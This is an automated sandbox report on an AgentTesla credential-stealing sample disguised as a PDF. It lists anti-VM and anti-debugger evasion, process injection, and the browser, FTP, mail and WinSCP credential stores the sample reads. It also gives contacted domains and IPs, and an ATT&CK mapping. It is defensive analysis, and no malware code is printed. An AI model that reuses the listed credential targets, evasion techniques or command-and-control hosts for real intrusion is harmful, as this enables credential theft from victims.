                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (reported 20 times)
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (reported 20 times)

                      Malware Analysis System Evasion:

                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Window / User API: threadDelayed 480
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Window / User API: threadDelayed 2830
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Window / User API: threadDelayed 1055
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Window / User API: threadDelayed 8763
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Window / User API: threadDelayed 1055
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Window / User API: threadDelayed 2255
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Window / User API: threadDelayed 1512
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Window / User API: threadDelayed 1798
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Window / User API: threadDelayed 1776
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Window / User API: threadDelayed 3515
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Window / User API: threadDelayed 6313
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 7008 | Thread sleep count: 480 > 30
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 7008 | Thread sleep count: 2830 > 30
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 6880 | Thread sleep time: -19369081277395017s >= -30000s
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 6868 | Thread sleep count: 1055 > 30
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 6868 | Thread sleep count: 8763 > 30
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 6880 | Thread sleep count: 40 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 1380 | Thread sleep count: 1055 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 1380 | Thread sleep count: 2255 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 7048 | Thread sleep count: 1512 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 7048 | Thread sleep count: 1798 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 7048 | Thread sleep count: 1776 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 4532 | Thread sleep time: -26747778906878833s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 1292 | Thread sleep count: 3515 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 1292 | Thread sleep count: 6313 > 30
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (reported 3 times)
                      Source: WerFault.exe, 00000020.00000002.884157462.000000000514C000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW~R]-
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.701811832.00000000051A0000.00000002.00000001.sdmp, NewApp.exe, 0000000F.00000002.860689934.0000000005840000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.861641127.0000000004AE0000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.915125012.0000000006340000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.900651409.0000000004F00000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: WerFault.exe, 0000000A.00000003.699166386.0000000004BF0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.895985393.00000000009D5000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000002.884157462.000000000514C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.701811832.00000000051A0000.00000002.00000001.sdmp, NewApp.exe, 0000000F.00000002.860689934.0000000005840000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.861641127.0000000004AE0000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.915125012.0000000006340000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.900651409.0000000004F00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.701811832.00000000051A0000.00000002.00000001.sdmp, NewApp.exe, 0000000F.00000002.860689934.0000000005840000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.861641127.0000000004AE0000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.915125012.0000000006340000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.900651409.0000000004F00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.923725606.0000000005F10000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: WerFault.exe, 0000000A.00000002.701355263.0000000004B74000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW e
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.701811832.00000000051A0000.00000002.00000001.sdmp, NewApp.exe, 0000000F.00000002.860689934.0000000005840000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.861641127.0000000004AE0000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.915125012.0000000006340000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.900651409.0000000004F00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Thread information set: HideFromDebugger (14 occurrences)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Thread information set: HideFromDebugger (28 occurrences)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Process queried: DebugPort (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process queried: DebugPort (4 occurrences)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_00E90A76 KiUserExceptionDispatcher,WaitForSingleObjectEx,IsWindowArranged,GetGeoInfoW,SetThreadDpiAwarenessContext,KiUserExceptionDispatcher,KiUserExceptionDispatcher,BuildReasonArray,GetPrivateProfileStringA,RecordShutdownReason,GlobalSize,EnableOneCoreTransformMode,GlobalSize,SetFileInformationByHandle,GlobalSize,GlobalSize,EnumDisplayMonitors,GlobalSize,LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Process token adjusted: Debug (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process token adjusted: Debug (3 occurrences)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Memory written: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Memory written: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe base: 400000 value starts with: 4D5A (2 occurrences)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Process created: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1 (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe (2 occurrences)
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1 (3 occurrences)
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912647673.0000000001420000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.912290547.0000000001C30000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912647673.0000000001420000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.912290547.0000000001C30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912647673.0000000001420000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.912290547.0000000001C30000.00000002.00000001.sdmp | Binary or memory string: Progman
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912647673.0000000001420000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.912290547.0000000001C30000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Queries volume information: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe VolumeInformation (2 occurrences)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation (2 occurrences)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation (2 occurrences)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (3 occurrences)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation (4 occurrences)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation (3 occurrences)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation (4 occurrences)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (3 occurrences)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001C.00000002.806272942.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.909001517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.679176630.00000000047A2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.883671585.0000000006979000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 4972, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 7056, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 5552, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 0603321WG_0_1 pdf.exe PID: 7004, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 0603321WG_0_1 pdf.exe PID: 4500, type: MEMORY
                      Source: Yara match | File source: 0.2.0603321WG_0_1 pdf.exe.47a2af0.9.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.650ce20.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.0603321WG_0_1 pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.0603321WG_0_1 pdf.exe.47d8910.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.6979bd8.12.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.NewApp.exe.51039d0.9.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.0603321WG_0_1 pdf.exe.47a2af0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.650ce20.11.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.6979bd8.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.NewApp.exe.51039d0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.NewApp.exe.50cdbb0.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.0603321WG_0_1 pdf.exe.47d8910.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.NewApp.exe.50cdbb0.8.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 occurrences)
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara match | File source: 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 5552, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 0603321WG_0_1 pdf.exe PID: 4500, type: MEMORY

                      Remote Access Functionality:

                      Yara detected AgentTesla
                      Source: Yara match | File sources: the same 30 memory dumps and unpacked PE files listed for this signature under "Stealing of Sensitive Information" above

                      Mitre Att&ck Matrix

                      Digits after a technique name are the count badges the report attaches to that cell.

                      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                      | Valid Accounts | Windows Management Instrumentation 211 | Registry Run Keys / Startup Folder 1 | Process Injection 112 | Disable or Modify Tools 1 | OS Credential Dumping 2 | File and Directory Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
                      | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 1 | Obfuscated Files or Information 2 | Input Capture 1 | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                      | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 2 | Credentials in Registry 1 | Query Registry 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                      | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Timestomp 1 | NTDS | Security Software Discovery 331 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud |
                      | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Virtualization/Sandbox Evasion 25 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
                      | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 25 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
                      | External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
                      | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 356527
Sample: 0603321WG_0_1 pdf.exe
Start date: 23/02/2021
Architecture: WINDOWS
Score: 100

Sample-level signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected AgentTesla; 5 other signatures
DNS: mail.orienttech.com.qa

Process tree as drawn in the graph (numbers after a process name are the count badges printed beside that node):

0603321WG_0_1 pdf.exe  15 3  (started)
    network: coroloboxorozor.com 172.67.172.17, ports 49731, 49763, 80, CLOUDFLARENETUS, United States
    signatures: Hides threads from debuggers; Injects a PE file into a foreign processes
    +-- 0603321WG_0_1 pdf.exe  2 5  (started)
    |       dropped: C:\Users\user\AppData\Roaming\...\NewApp.exe, PE32
    |       dropped: C:\Users\user\...\NewApp.exe:Zone.Identifier, ASCII
    |       signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; 2 other signatures
    +-- cmd.exe  1  (started)
    |       +-- conhost.exe  (started)
    |       +-- timeout.exe  1  (started)
    +-- WerFault.exe  23 9  (started)
            network: 192.168.2.1 unknown unknown

NewApp.exe  14 3  (started)
    network: 104.21.71.230, ports 49750, 80, CLOUDFLARENETUS, United States
    signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
    +-- cmd.exe  (started)
    |       +-- conhost.exe  (started)
    |       +-- timeout.exe  (started)
    +-- NewApp.exe  (started)
    +-- WerFault.exe  (started)

NewApp.exe  3  (started)
    +-- cmd.exe  (started)
    |       +-- conhost.exe  (started)
    |       +-- timeout.exe  (started)
    +-- NewApp.exe  (started)
    +-- WerFault.exe  (started)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
0603321WG_0_1 pdf.exe | 22% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
0603321WG_0_1 pdf.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | 22% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.0603321WG_0_1 pdf.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
28.2.NewApp.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
27.2.NewApp.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://mail.orienttech.com.qa | 0% | Avira URL Cloud | safe
http://coroloboxorozor.com | 0% | Avira URL Cloud | safe
https://api.ipify.org%$ | 0% | Avira URL Cloud | safe
http://r3.i.lencr.org/0 | 0% | URL Reputation | safe
http://coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html | 0% | Avira URL Cloud | safe
http://r3.o.lencr.org0 | 0% | URL Reputation | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://ajyrmk.com | 0% | Avira URL Cloud | safe
http://IScLhfPkYRYa5.com | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.orienttech.com.qa | 162.241.85.66 | true | true | | unknown
coroloboxorozor.com | 172.67.172.17 | true | false | | unknown

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html | false | Avira URL Cloud: safe | unknown
http://IScLhfPkYRYa5.com | true | Avira URL Cloud: safe | unknown

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
http://127.0.0.1:HTTP/1.1 | 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, NewApp.exe, 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://cps.letsencrypt.org0 | 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, NewApp.exe, 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | false | | high
